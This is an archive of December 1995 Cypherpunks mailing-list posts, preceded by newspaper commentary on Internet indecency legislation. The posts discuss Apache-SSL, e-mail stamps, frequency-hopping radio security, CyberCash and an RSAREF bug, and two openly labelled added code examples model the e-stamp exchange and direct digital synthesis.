   It won't be easy. The main legal questions about the
   proposed Internet indecency regulations as they now stand
   are inextricably wound up with technical issues. Can the
   "transmitters" of material that is deemed "indecent" ensure
   to a reasonable degree of certainty that underage computer
   users cannot get to it? If they fail, how can they show
   they tried? Several ideas here are flags for trouble.

   No legally solid test exists for the "indecency" standard
   now in the regulations -- patterned on those used for
   earlier dial-a-porn legislation but addressing totally
   different technologies. The coalition of moderate conferees
   had tried to replace the term with the more explicit
   "harmful to minors" but failed by a single vote. The
   Justice Department said in a letter last week that a
   "harmful to minors" standard was more likely than
   "indecency" to pass scrutiny but that "an overly broad
   restriction would likely not withstand constitutional
   scrutiny regardless of the standard chosen."

   That brings up the meaning of "transmit." Who is
   responsible for "transmitting" a smutty text that, say, a
   high school student locates by using an ordinary commercial
   account to (1) find, download and install free software
   that searches the Web, (2) use that tool to find a
   pornographic bulletin board overseas, and (3) make a copy
   to store in his own computer?

   The regulations now would punish anyone who "uses any
   interactive computer service to display [indecent material]
   in a manner available to a person under 18 years of age."
   But the bulletin board overseas isn't subject to U.S. law.
   Most likely it will be up to the commercial providers to
   demand ID for certain types of accounts -- or up to
   account-buying parents to limit the scope of their kids'
   accounts. Whether providers can actually wall off sectors
   of the electronic world without cooperation from the adults
   paying the bills has more to do with the available
   electronic gizmos than with the laws governing the world to
   which they give access.

   There is much complicated back-and-forth about whether
   providers such as America Online and Prodigy will be held
   responsible for the effectiveness of the measures they
   take. But only the courts can decide what truly works. A
   court muddled its way through the Prodigy case on this
   topic in New York State recently. It declined to modify its
   own judgment that the provider was more liable because it
   had tried to create a "PG bulletin board" than if it had
   not. Whether or not this stands, it's a measure of the
   disconnect that persists as this legislation stumbles
   toward final enaction.

----------

   The NY Times, Dec 26, 1995:

   Mr. Hollings Saves the Phone Bill

   House and Senate conferees seemed ready to negotiate a
   damaging telecommunications compromise until Senator Ernest
   Hollings of South Carolina, the chief Senate negotiator,
   altered that destiny last week. Wielding the threat of a
   filibuster and a deft legislative hand, he rescued the best
   parts of flawed House and Senate bills passed earlier,
   added some good new ideas and threw out most of the rot.

   His draft bill could spark innovation and set off
   consumer-friendly competition among television, cable and
   telephone companies. Its biggest flaw is a heavy-handed and
   probably unconstitutional effort to ban "indecent material"
   from the Internet.

   The original bills sought to break down barriers that keep
   media companies from entering each other's markets. But
   three mistakes were made. The bills would have deregulated
   cable rates before competition by other video companies
   could protect customers from price-gouging cable operators.
   Local phone companies would have been allowed to enter the
   long-distance market before they faced competition from
   cable or other companies. Worse still, the bills would have
   allowed broadcasters, cable operators, telephone companies
   and newspapers to merge too easily. That could expose
   consumers to a frightening concentration of information
   sources.

   Mr. Hollings, with the help of key Republicans like Senator
   Larry Pressler, fixed most of these flaws. His draft bill
   would hold up entry of local phone companies into
   long-distance service until the Federal Communications
   Commission says O.K. after giving weight to an antitrust
   review by the Justice Department. The bill leaves it up to
   the F.C.C. to set reasonable guidelines for mergers. It
   would put off deregulation of most cable rates for three
   years -- enough time for phone and satellite services to
   take on cable operators.

   The one serious error is a prohibition against transmission
   of allegedly indecent materials over the Internet -- the
   network of millions of on-line computer subscribers around
   the world. The indecency standard is probably
   unconstitutionally vague and restrictive. The standard is
   also unnecessary. The law already forbids sending obscene
   materials by computer. To protect children, parents can buy
   easy-to-use programs that block indecent materials from any
   source. The draft bill threatens to trigger further
   Government control of electronic communication -- which has
   blossomed so far precisely because Government has stayed on
   the sidelines. Fortunately, Republican leaders like Speaker
   Newt Gingrich are troubled by the indecency standard. There
   is a good opportunity to knock the provision out before
   Congress takes a vote.

   Some Republicans, miffed when Vice President Al Gore
   declared the draft an Administration victory, threatened to
   withhold support. But telecommunications, the heart of a
   high-tech economy, is too important for small-minded
   sparring. Congress should take up the draft bill, remove
   the indecency provision and put Mr. Hollings's good deed
   into law.

----------

   [The coccyx of a 12-26-95 WSJ eunucher]:

   First Amendment advocates, who have criticized the bill
   because it cracks down on Internet indecency and sets up a
   rating system and show-blocking circuitry against TV
   violence, got one small gift: The bill contains a provision
   for an expedited legal review of the constitutionality of
   those provisions. On the other hand, it also sets up a new
   law allowing 10-year prison terms for anyone who, using
   interstate phone calls, mail or other means, "persuades,
   induces, entices, or coerces" a minor to engage in any
   illegal sexual act.














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 27 Dec 1995 18:02:36 +0800
To: cypherpunks@toad.com
Subject: COMMUNITY CONNEXION ANNOUNCES APACHE-SSL COMMERCE
Message-ID: <199512262112.NAA00652@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


For Immediate Release
Contact: Sameer Parekh 510-601-9777

COMMUNITY CONNEXION ANNOUNCES APACHE-SSL COMMERCE

Community ConneXion today announced Apache-SSL Commerce, a commercial
version of the Apache webserver with support for Netscape
Communication Corporation's Secure Sockets Layer, a standard for
encrypted communications over the Internet.

Community ConneXion's Apache-SSL package includes Apache v1.0.0,
extensions to Apache which enable the SSL protocol, additional
customizations to the webserver, and tools to aid in server and SSL
maintenance. The server supports virtual hosts and an extensible API
to allow for easy modifications to the behavior of the server. Apache
is currently the fastest growing HTTP server, looking set to become
the most used web server on the net in 1996.

Sameer Parekh, President of Community ConneXion, commented on their
release of the encrypting webserver, "We're very happy to make
available an affordable SSL server to the Internet community. For
security to work, it must be ubiquitous, which requires that
encrypting servers be affordable and widely deployed."

Apache-SSL is available for free to non-commercial users, and the
commercial use package, Apache-SSL Commerce, is available for
$495.00. Customers who own versions of other commercial encrypting
webservers can upgrade to Apache-SSL Commerce for $295.00.  In
addition to the right to use the server in commercial applications,
the commercial package includes support and free lifetime upgrades
from Community ConneXion.  Apache-SSL Commerce is not available
outside the United States, but Apache-SSL is available for free, both
commercially and non-commercially, outside the United States from Ben
Laurie, of A. L. Digital, Ltd.

The Apache-SSL Commerce webserver is the only commercial encrypting
webserver with source available. Ian Goldberg, graduate student at
U.C. Berkeley, well-known for his work on SSL security, commented on
the importance of available source, "The public release of source,
especially for security-critical sections of code, is vital for a
product in which the public must put its trust.  It's far better for
me to be able to check the software that's used, say, for accessing my
bank account via the Web, for security problems, than for me to be
forced to trust whatever company put out the product.  Companies will
soon find that releasing more information about the internals of their
products will lead not only to better products, but better
reputations, as well."

Portions developed by the Apache Group, taken with permission from the
Apache Server http://www.apache.org/.  This product includes software
developed by Ben Laurie for use in the Apache-SSL HTTP server project.
This product includes software developed by Eric Young
(eay@mincom.oz.au).

Information on Apache-SSL is available at
http://www.c2.org/apachessl/. Questions and inquiries regarding the
server should be sent to apachessl@c2.org.

Community ConneXion, founded in June of 1994, is the leading provider
of privacy on the Internet. They provide anonymous and pseudonymous
internet access and web pages in addition to powerful web service,
virtual hosts, and web design consultation. Information is available
from their web pages at http://www.c2.org/.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Thu, 28 Dec 1995 04:48:49 +0800
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: Re: Only accepting e-mail from known parties
Message-ID: <199512261823.NAA27668@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Dec 26, 1995 08:37:30, '"Robert A. Rosenberg" <hal9001@panix.com>'
wrote: 
 
 
>At 14:33 12/25/95, tallpaul wrote: 
> 
>>Thoughts? (I see one problem with this but it should be able to be worked
>>out once the basic method is agreed to). 
> 
>I assume that the "Problem" is that by only giving each correspondent ONE 
>E-Stamp, you are single streaming your connections with them (ie: Are 
>talking Half-Duplex). Not only are they restricted to one message 
>"in-flight" but they can not start another message until they have done a 
>capture run to acquire your ACK and get the new key. 
> 
 
Actually, with e-mail the problem was an infinite loop of stamp exchanges.
E.G. both of us are finickians who only accept e-mail from known
associates. So they send me an e-message with the correct stamp. I send
them an acknowledgment with a new stamp, but ... they won't accept the
message from me unless I stamp it. So I stamp my return receipt. They get
the return receipt and have to send me a new stamp, using the stamp I just
sent them. I then acknowledge receipt from them, using the stamp they just
sent me, and it is turtles all the way down. 
 
The workaround would be to have a semi-psycho e-bot who hoarded stamps,
i.e. would accept stamps from anybody without treating an e-stamp as an
e-mail message to me. 
 
I hadn't picked up the problem you mentioned. Thanks for pointing it out. 
 
I supposed the fix would be to send family (so to speak) books of stamps so
they could send multiple messages when I was on vacation, my personal e-bot
was down, etc. Of course, then family could get conned out of their stamps
by smooth talking ad spammers. But this would, I think, be a rare
occurrence. That is, I wasn't thinking of *absolute* security just "good
enough privacy." 
 
--tallpaul
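
[Added example, not part of the archived thread or any poster's code.] A small model of the e-stamp exchange discussed in the "Only accepting e-mail from known parties" messages above: it reproduces the endless receipt loop between two stamp-requiring mailboxes, the stamp-hoarding bot workaround, and the one-message-in-flight limit that a book of stamps lifts. The Mailbox and Message classes, the random single-use stamps and the 50-delivery cap are assumptions made for this illustration.

```python
import secrets
from collections import deque
from dataclasses import dataclass
from typing import Optional

@dataclass
class Message:
    sender: "Mailbox"
    recipient: "Mailbox"
    stamp: Optional[str]   # stamp the recipient issued; None = bare stamp delivery
    body: Optional[str]    # None for a receipt that only carries a refill
    refill: Optional[str]  # fresh stamp the sender issues to the recipient

class Mailbox:
    """Accepts mail only when it carries an unspent stamp issued to that sender."""
    def __init__(self, name, hoards_stamps=False):
        self.name = name
        self.hoards_stamps = hoards_stamps  # the stamp-hoarding bot workaround
        self.issued = {}   # my unspent stamps -> name of the peer they were given to
        self.wallet = {}   # peer name -> stamps that peer issued to me
        self.inbox = []    # bodies that reached the human

    def issue(self, peer):
        stamp = secrets.token_hex(8)        # single-use, unguessable
        self.issued[stamp] = peer.name
        return stamp

    def bank(self, peer, stamp):
        self.wallet.setdefault(peer.name, []).append(stamp)

    def compose(self, peer, body, refill=None):
        stamps = self.wallet.get(peer.name, [])
        if not stamps:
            return None                     # no stamp left: cannot write (half-duplex limit)
        return Message(self, peer, stamps.pop(), body, refill)

    def receive(self, msg):
        """Process one message and return the reply it forces, if any."""
        peer = msg.sender
        if msg.stamp is None:
            # Bare stamp delivery: only a hoarding bot takes it, and because it is
            # not treated as mail, nothing is owed in return.
            if self.hoards_stamps and msg.refill:
                self.bank(peer, msg.refill)
            return None
        if self.issued.get(msg.stamp) != peer.name:
            return None                     # unknown, foreign or already-spent stamp
        del self.issued[msg.stamp]          # spend it
        if msg.refill:
            self.bank(peer, msg.refill)
        if msg.body is not None:
            self.inbox.append(msg.body)
        replacement = self.issue(peer)      # the peer spent a stamp, so replace it
        if peer.hoards_stamps:
            return Message(self, peer, None, None, replacement)
        # Without the bot, the replacement must travel as stamped mail, which
        # spends one of the peer's stamps and obliges the peer to answer in turn.
        return self.compose(peer, None, refill=replacement)

def simulate(hoard, book=1, burst=1, cap=50):
    """A writes `burst` notes to B before reading any mail; each side starts
    with `book` stamps from the other. Delivery stops after `cap` messages."""
    a, b = Mailbox("A", hoard), Mailbox("B", hoard)
    for _ in range(book):
        a.bank(b, b.issue(a))
        b.bank(a, a.issue(b))
    queue = deque()
    for i in range(burst):
        msg = a.compose(b, f"note {i + 1}")
        if msg is not None:
            queue.append(msg)
    sent, delivered = len(queue), 0
    while queue and delivered < cap:
        msg = queue.popleft()
        delivered += 1
        reply = msg.recipient.receive(msg)
        if reply is not None:
            queue.append(reply)
    return {"sent_in_burst": sent, "delivered": delivered, "looped": bool(queue),
            "b_inbox": b.inbox, "a_stamps_left": len(a.wallet.get("B", []))}

if __name__ == "__main__":
    print("no bot, one stamp each :", simulate(hoard=False))
    print("hoarding bot           :", simulate(hoard=True))
    print("bot, 1 stamp, 3 notes  :", simulate(hoard=True, book=1, burst=3))
    print("bot, book of 3, 3 notes:", simulate(hoard=True, book=3, burst=3))
```
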




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net (Jason Rentz)
Date: Wed, 27 Dec 1995 16:28:33 +0800
To: cypherpunks@toad.com
Subject: Re: FH radios
Message-ID: <199512262025.OAA09759@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


Dave Emery  writes:

>	There is also a newer technology called direct digital synthesis
>or DDS that works by accumulating phase (adding to the previous value) 

We use DDS in some of our Microwave equipment between sites.  


>
>	There is certainly little additional cost to building a
>truly secure digital cordless phone given the dense ASIC technology
>that is standard in this kind of product - but someone has to
>persuade the manufacturers that there is a real need and find a way
>to allow them to export the product.
>

I agree; but, if the information you are passing is truly that important
just use a landline phone.  Eliminate the possible "leak".
I'm not claiming that a landline phone is secure, but your cordless is
connected to it, so no matter how good your security is on the phone it's no
longer secure once it leaves the base station and enters the landline.

Further encryption can be implemented but this requires equipment on both
ends.  Really aren't we trying to create the most secure methods of
information exchange with the least amount of cost?  I'm budget restricted
so PGP and the internet are more secure and cheaper for me than most other
means of communication, so far. :)


                        Dr0id
                        

(andr0id@midwest.net  callsign: N9XLM)
( Computer Consulting & Management   )
(P.O. Box 421  Cambria, IL 62915-0421)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Klur" <dklur@dttus.com>
Date: Wed, 27 Dec 1995 20:59:19 +0800
To: WWW-BUYINFO@ALLEGRA.ATT.COM
Subject: Cybercash security
Message-ID: <9511268200.AA820017186@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     
     What are the major security risks of the Cybercash system?  
     I can't really find any, other than someone cracking the consumer's 
     Cybercash client s/w password and using the victim's account to order 
     something, or someone cracking RSA!.  The following features seem to 
     mitigate other risks...
     
     
     - The merchant never sees the credit card number
     
     - The Cybercash server does not store any credit card numbers (only 
     temporarily while it is waiting for an authorization for a specific 
     card purchase)
     
     - The consumer's credit card number is stored on his hard disk 
     encrypted w/DES
     
     - The consumer sends his credit card number across the Internet 
     encrypted w/DES and signed w/ 768-bit RSA
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stig@hackvan.com (Stig)
Date: Wed, 27 Dec 1995 21:15:33 +0800
To: otaku@comsat.hackvan.com>
Subject: Fwd: Re: Fwd: Re: FH radios [Dave Emery]  [Vaughan Pratt]
Message-ID: <m0tUjjD-0006F1C@hackvan.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


I forwarded a cypherpunks message to technomads, where it got a killer
response, so I'll bounce it back to Cypherpunks...

    Stig
    

- ------- start of forwarded message (RFC 934 encapsulation) -------
From: Vaughan Pratt <pratt@cs.stanford.edu>
To: technomads@UCSD.EDU
Subject: Re: Fwd: Re: FH radios [Dave Emery] 
Sender: pratt@cs.stanford.edu
Date: Tue, 26 Dec 1995 12:00:43 -0800
Message-Id: <199512262000.MAA23334@Coraki.Stanford.EDU>
In-reply-to: Your message of "Tue, 26 Dec 1995 07:07:00 PST."
             <m0tUayp-0006F0C@hackvan.com> 


>>> Thus in a frequency-hopping radio you can push the retuning (read RF
>>> phase-locked loop) technology to its limit and build transmitters and
>>> receivers around them. These typically hop in the order of 100 times a
>>> second. The adversary has to find the uncorrelated signal very quickly
>>> indeed *and* have PLL technology at least as good as yours to recover
>>> anything from it. Finding the signal generally means listening to all
>>> frequencies at once, requiring huge amounts of hardware parallelism and/or
>>> realtime computing power. Once you throw ten or so radios onto the same
>>> band, it's no longer any use looking for the strongest signal, making that
>>> approach useless.
>> 
>> This is nowhere near the limit of the technology.  15 years ago, I was
>> working on PLLs that would stabilize within a couple degrees of final
>> phase within 3.5 microseconds.  That permits you to do useful work at
>> 100,000 hops per second.
>> 
>	There is also a newer technology called direct digital synthesis
>or DDS that works by accumulating phase (adding to the previous value) 
>each tick of a high frequency clock in a register at a rate determined
>by the contents of another register (the value here sets the frequency)
>with the upper bits of the accumulated phase being used to address a
>sine/cosine lookup table rom which in turn feeds digital output values
>into a D/A converter.  The output of the D/A converter is a sampled 
>approximation of a sine or cosine wave at a frequency set by the
>increment register.  The sample rate is set by the high frequency clock
>rate.

This is all wishful thinking.  A 26-MHz wide channel such as 902-928MHz
has a channel capacity of 2*26 Mbs or 6.5 megabytes/sec.  So if someone
can tell *that* you are transmitting somewhere within that channel then
they simply record *everything* at that data rate in the entire
channel, your transmission and everyone else's, for the necessary
time.  A $600 3.5Gb Sequel drive can record a ten-minute transmission;
then the eavesdropper can use one Pentium or two dozen, budget
permitting, to extract your message from that data.  If all you are
doing is frequency hopping or spread spectrum, reconstruction is a very
undemanding algorithmic task, and one Pentium should be able to
reconstruct your signal the same day, two dozen the same hour.

>But to get back to the original point of this thread - while
>such techniques are possible (as is full hard encryption), it is my
>understanding that actual consumer 900 mhz digital cordless phones
>that use frequency hopping use a very limited set of frequencies
>and a small set of fixed hopping patterns and don't hop very fast. 

Hopping speed is almost completely irrelevant to the computational
complexity of this problem.

>When the brand of cordless phones that most emphasizes security
>from eavesdropping in its point of sale advertising display is the one that
>uses open FM with simple speech inversion you know there is something
>wrong, particularly when the company that makes it is a pioneer in
>really secure digital speech over handheld radios (and a big government
>contractor).

To put it mildly.

You can never overestimate the cost of decryption.  What looks
expensive enough today to decrypt can plummet by orders of magnitude on
alarmingly short notice.  We used to think TCP was mildly secure until
easily installed sniffers became freely available on the internet that
would reconstruct a telnet connection and print out the first 100
characters, making it child's play to extract passwords.

If you think that you are secure because the effort of an attack seems
on the high side, bear in mind that the tasks in a systematic attack can
by definition of "systematic" be programmed, greatly easing the
attacker's task.  And once programmed, the program can be distributed to
all and sundry on the internet.

If a given level of cryptographic strength seems adequate for a message,
add several orders of magnitude and maybe you'll be lucky.  

I know of only two really satisfactory places to hide information worth
hiding: combinatorial search space (read: real encryption such as DES
or RSA, with a hefty key), and the real world, which as a search space
is approximately the size corresponding to a combinatorial space
encrypted with a 256-bit key (i.e. the world seems bigger than 128 bits
and smaller than 512).  The latter is distributed in space-time and
frequency (momentum-energy); if you consider only space-time or only
frequency the universe looks like only a 128-bit hiding place in either
case.  Both together give you 256 bits (very approximately, that's a
very round binary number).

Vaughan Pratt
- ------- end -------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMOCS5khaKuRiAqcVAQEJEAP/WNqKrjrGk5LpYt5fw70BtFYZEIMqkBzu
TQscTmoK2sSOeI9yjxmOp8aQhArLpOdN0ZQgfwkuelfV+/n73ms3hMV+JIDOvuFx
hirE1iBvZDMgEPX1BdyP94Me13a1f8mBKTTG1cPLIYKLSTZ1tmQ/MVI0EYN9H16U
AETV7FJilvM=
=l+fI
-----END PGP SIGNATURE-----
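
The DDS scheme described in the quoted text above (a phase accumulator stepped by an increment register, with its upper bits addressing a sine table), worked through in C as an added example; it is not code from any poster in this thread. The 1 MHz clock, 8-bit table, 8-bit samples and hop frequencies are constructed values, and all function names are hypothetical.

```c
#include <stdint.h>
#include <stdio.h>

#define LUT_BITS 8                 /* upper accumulator bits that address the table */
#define LUT_SIZE (1u << LUT_BITS)
#define F_CLK_HZ 1000000u          /* constructed clock rate for this example */
#define DWELL_TICKS 100000u        /* constructed dwell: 0.1 s per hop at F_CLK_HZ */

static int8_t sine_lut[LUT_SIZE];  /* stands in for the sine lookup table ROM */

/* Fill the table by rotating a unit phasor 2*pi/256 per entry (no libm needed). */
static void dds_init_lut(void)
{
    const double S = 0.024541228522912288;   /* sin(2*pi/256) */
    const double C = 0.99969881869620425;    /* cos(2*pi/256) */
    double s = 0.0, c = 1.0;
    for (unsigned i = 0; i < LUT_SIZE; i++) {
        double v = s * 127.0, ns = s * C + c * S;
        sine_lut[i] = (int8_t)(v >= 0 ? v + 0.5 : v - 0.5);   /* round to nearest */
        c = c * C - s * S;
        s = ns;
    }
}

struct dds {
    uint32_t phase;    /* phase accumulator: one full turn is 2^32 */
    uint32_t tuning;   /* increment register: sets the output frequency */
};

/* Increment that yields f_out from clock f_clk: round(f_out * 2^32 / f_clk). */
static uint32_t dds_tuning_word(uint32_t f_out_hz, uint32_t f_clk_hz)
{
    return (uint32_t)((((uint64_t)f_out_hz << 32) + f_clk_hz / 2) / f_clk_hz);
}

/* One clock tick: accumulate phase, return the sample that would feed the D/A. */
static int8_t dds_tick(struct dds *d)
{
    d->phase += d->tuning;                        /* wraps modulo 2^32 */
    return sine_lut[d->phase >> (32 - LUT_BITS)];
}

/* Run for `ticks` clocks; return completed output cycles (accumulator wraps). */
static uint32_t dds_run(struct dds *d, uint32_t ticks)
{
    uint32_t cycles = 0;
    while (ticks--) {
        uint32_t before = d->phase;
        (void)dds_tick(d);
        if (d->phase < before)
            cycles++;
    }
    return cycles;
}

/* Constructed hop plan: a hop is nothing more than a new increment value. */
static const uint32_t hop_hz[] = { 10000u, 40000u, 30000u };
#define HOP_COUNT (sizeof hop_hz / sizeof hop_hz[0])

/* Output cycles produced during dwell number `which` of the hop plan. */
static uint32_t hop_cycles(unsigned which)
{
    struct dds d = { 0, 0 };
    uint32_t cycles = 0;
    dds_init_lut();
    for (unsigned i = 0; i < HOP_COUNT && i <= which; i++) {
        d.tuning = dds_tuning_word(hop_hz[i], F_CLK_HZ);   /* phase carries over */
        cycles = dds_run(&d, DWELL_TICKS);
    }
    return which < HOP_COUNT ? cycles : 0;
}

/* Sample n (1-based) of an f_clk/4 tone: steps through the table 90 degrees per tick. */
static int quarter_rate_sample(unsigned n)
{
    struct dds d = { 0, 1u << 30 };
    int8_t s = 0;
    dds_init_lut();
    while (n--)
        s = dds_tick(&d);
    return s;
}

int main(void)
{
    for (unsigned i = 0; i < HOP_COUNT; i++)
        printf("%u Hz: tuning word %u, %u cycles in 0.1 s\n",
               (unsigned)hop_hz[i],
               (unsigned)dds_tuning_word(hop_hz[i], F_CLK_HZ),
               (unsigned)hop_cycles(i));
    return 0;
}
```
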




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 28 Dec 1995 00:41:34 +0800
To: cypherpunks@toad.com
Subject: fun with rsaref and 64-bit machines
Message-ID: <199512270120.RAA19559@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Does anyone know if RSAREF works on 64 bit CPUs? It seems
that RSAREF's NN_Mod is getting stuck in digit.c at:

99         */
100       while ((t[1] > 0) || ((t[1] == 0) && t[0] >= c)) {
101         if ((t[0] -= c) > (MAX_NN_DIGIT - c))
102           t[1]--;
103         aLow++;
104       }


	on a dec alpha..
-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 28 Dec 1995 01:57:52 +0800
To: cypherpunks@toad.com
Subject: a new idea: stocks == currency
Message-ID: <199512270222.SAA01737@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I've been mulling over recent essays on digital cash by diverse authors
that have popped up here and elsewhere and I'd like to highlight a 
revolutionary new "meme" of high cpunk relevance I see emerging, which 
I've not seen promoted by any single author yet (although I have seen
some prominent cpunks argue the opposite).

the basic thesis is as follows. digital cash obviously leads to an entirely
new economic system in which the nature of routine future transactions may be 
radically altered. one of the chief alterations discussed ad infinitum on
this list is the rise of economic freedom from taxation etc.   however
there is another interesting theme that is worth exploring at length that
is at least as significant as this (bugaboo) taxation issue.

one might look at the modern world and suggest that there is an increasing
unification of currencies. the EU (European Union) is an example of this
"trend". however I'm going to argue the opposite and suggest that the
trend is toward increasing diversity of currencies. I believe we are
moving toward a new system in which explosively more "currencies" will exist
than do today.

where will these come from? answer: stocks. I believe that future company
stock will be considered a kind of currency issued by the company. when
you are buying and selling stocks, what you are really doing is buying
and selling currencies backed by different corporate entities. 

I have seen EH argue here and elsewhere that only a government has the
legal capability of creating a currency. his view is that a currency is
backed through *liability* that is enforced through laws. this is an 
interesting statist-flavor argument coming from a radical libertarian.

what I would propose instead is that what a government has is *credibility*.
this is the old "reputation capital" issue discussed here frequently too.
a government is a massive entity larger than many companies that uses its
full legislative "force" to back its currency.   in another word,
*trust*.

however, I don't believe there is fundamentally a major difference 
between a company and a government, particularly in this area.
(go ahead, flame me to oblivion for saying this, but I believe it is 
actually a very libertarian argument.) the only difference is in size
and influence. it seems to me when a private company issues "cash", the
basic principle is the same. the person who uses this cash is *trusting*
the entity that issues it to back it with whatever they say they are
backing with it. to use my stocks == currency analogy, the stock or currency
of that company is backed by that company's assets and profitability.

the interesting theme behind this is that it unifies the entire economic
picture. suddenly the difference between currency and a stock tends to
blur when stocks

1. can be exchanged readily
2. there is no government intervention/regulation in the exchange
3. middleman ("stockbroker" etc.) costs are minimized
4. (other similar elements yet to be identified)

note that all these things appear to be the inevitable trend of uniting
an economic system with cyberspace.

--

my view of all this is somewhat blasphemous. the current system
says that we have to have a government entity called the SEC to ensure
that stocks are safe for those who invest in them. however, what I am
suggesting is that a free market can actually devise its own methods of
sorting out bogus from valid currency/stocks without government intervention.
in fact, in my opinion that's precisely what investment advice is. this
is exactly analogous too to the way that capital "naturally" moves away
from unstable currencies and economies (of course capital does not do it,
but the intelligent human forces that guide it amount to this basic effect).

hence what I am proposing is a sort of currency spectrum. stocks are
high risk but greater profit, and currency is low risk (stable) but
subject to inflation or loss of value. they are two ends on a 
currency spectrum. and what I am proposing is that in the future, this
currency spectrum will tend to emerge out of economic transactions in
cyberspace. 

this currency spectrum will be recognized as a basic function of
the cyberspatial economy. this economy will evolve overall to cut  out
middlemen and anything that decreases cash value. hence, you will see
things such as companies offering their own cash (stock) directly to 
"consumers" without the large overhead associated with today's stock market 
(which will be considered a rather backward way of running an economy in the
future because of the horrendous dissipation of capital involved in merely
moving it from place to place).

--

in the end, the government and various bankers lose their economic
monopoly on "creating" cash, which affords them no end to manipulative
capabilities. governments will compete with all other entities that desire
to create cash systems. cash will move where governments and entities most
"respect" it. oppressive tax laws etc. will be considered a lack of "respect" 
for cash.

I know that the opposite trend seems to be happening: an increasing clampdown
on "black cash". I think this may actually succeed in the short run, but
the eventual movement of the economy is toward unrestrained cash in the
same way there is a clear movement to an unrestrained cyberspace. there
may be "blips" or "disturbances" on the way, but they'd merely be anomalies.

my own view is that governments are either legitimately created or they
are not ("consent of the governed" etc.). 
if they are legitimately created and maintained, then people will continue to
support them even when it seems they have the choice not to (such as
evade taxes). if they are not supported, then they are not legitimate.
putting one's money where one's mouth is is the ultimate test of legitimacy
in our reality. that is, support of a government by its people is the
ultimate test of its legitimacy, and the ultimate test of support
is *cash*transferred*. no amount of policemen thugs pointing machine
guns at tax protesters attempting to intimidate the entire population
will change this basic reality imho.

in fact I believe that many systems of today that are based on intimidation
are going to dissolve as cyberspace becomes more prevalent. the scientology
battle is a good example of this. before the internet their litigious
intimidation tactics may have succeeded (and arguably did). however the 
tactics are becoming increasingly discredited in my view. 

but I am not saying this will happen without a struggle. I believe this
will be the ultimate conclusion after a lot of turbulence and perhaps
even bloodshed.

--

today we think that cash moves around the world very readily, in the blink
of an eye. but I suggest that today we actually have tremendous amounts
of "friction" that are dissipating economic value of "currencies" merely
as it moves through the system (the stock market would be one example).
looking only at today's *cash* systems, indeed there is low friction, but
when one considers that *stocks* are actually cash, then our overall economic
system is quite backward. cyberspace will act as a sort of 
economic lubricant of the highest degree in decreasing this friction.

I will debate intelligent opposition to these ideas in this essay, but
frankly I think what I describe is a reality that is going to emerge 
completely independent of my own promotion or anyone else's opposition.
the famous Gilmore quote is that "cyberspace sees censorship as a defect
and routes around it" has an analogy in the economic realm: 
"cash sees the middlemen as a defect and routes around him". inflation is
one example of instability or lack of resiliency (a defect) of a currency. 
it can be seen as the exact opposite effect the growth of a stock is: loss 
of economic capital due to dissipation.

I imagine one of the main claims against my essay will be as I anticipated
above: only governments have the force and power necessary to back a 
currency. but I believe this is an anti-libertarian view. it suggests
that cash only works when the government is involved, and the force
associated with that government is employed as a means of keeping the
system in check. can one have an economic system not based on mandatory
obeisance to a government? I think it is clear to most on this list
such a thing is not only possible but advantageous, desirable, and 
preferable.

the "trust" that a person places in a company stock is absolutely no
different, in essence, from that placed in a currency of a government--
only the scale and the participants are different. I don't really believe
that the legal framework associated with a government is what holds 
commerce together. there are many situations where companies simply
eat their losses even when they are in the "right" legally and could
sue and win.

cyberspace will tend to prefer "anticipation" to legalities. in other
words, it will tend to prefer to develop systems that anticipate failure
(such as currency crashes) before they happen. courts will be seen as the 
absolute last resort for any kind of arbitration. in my view this has 
already happened today. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 28 Dec 1995 04:14:19 +0800
To: sameer <cypherpunks@toad.com
Subject: Re: COMMUNITY CONNEXION ANNOUNCES APACHE-SSL COMMERCE
Message-ID: <199512270332.TAA01269@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:12 PM 12/26/95 -0800, sameer wrote:
> The Apache-SSL Commerce webserver is the only commercial encrypting
> webserver with source available. Ian Goldberg, graduate student at
> U.C. Berkeley, well-known for his work on SSL security, commented on
> the importance of available source,

Thanks for the great work.

This protects the web against GAK far more effectively than any
political campaign ever could.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Wed, 27 Dec 1995 23:07:25 +0800
To: cypherpunks@toad.com
Subject: MD5 for DOS/Windows
Message-ID: <Pine.3.89.9512262006.A24030-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Anybody have a DOS or Windows implementation of MD5 available?
Thanks.

--
PJ Ponder






